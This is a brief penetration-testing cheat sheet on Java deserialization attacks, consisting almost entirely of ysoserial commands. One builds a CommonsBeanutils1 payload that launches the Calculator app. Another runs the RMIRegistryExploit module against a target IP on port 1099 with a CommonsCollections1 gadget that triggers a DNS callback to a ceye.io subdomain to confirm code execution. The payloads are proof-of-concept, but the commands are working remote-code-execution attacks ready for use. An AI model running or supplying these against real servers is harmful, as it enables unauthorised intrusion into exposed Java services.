Security CheatSheet

Java deserialization

Generating a payload with ysoserial

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 'open /System/Applications/Calculator.app'

Attacking RMI

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 1.1.1.1 1099 CommonsCollections1 "dig test.xxxxx.ceye.io"